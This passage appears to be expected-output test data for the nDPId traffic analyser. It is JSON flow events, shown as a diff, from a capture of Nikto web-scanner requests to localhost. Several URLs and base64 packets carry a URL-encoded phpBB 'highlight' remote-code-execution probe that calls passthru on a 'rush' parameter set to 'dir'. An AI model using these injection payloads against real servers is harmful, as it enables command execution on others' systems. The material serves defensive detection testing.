-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="} 
-01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
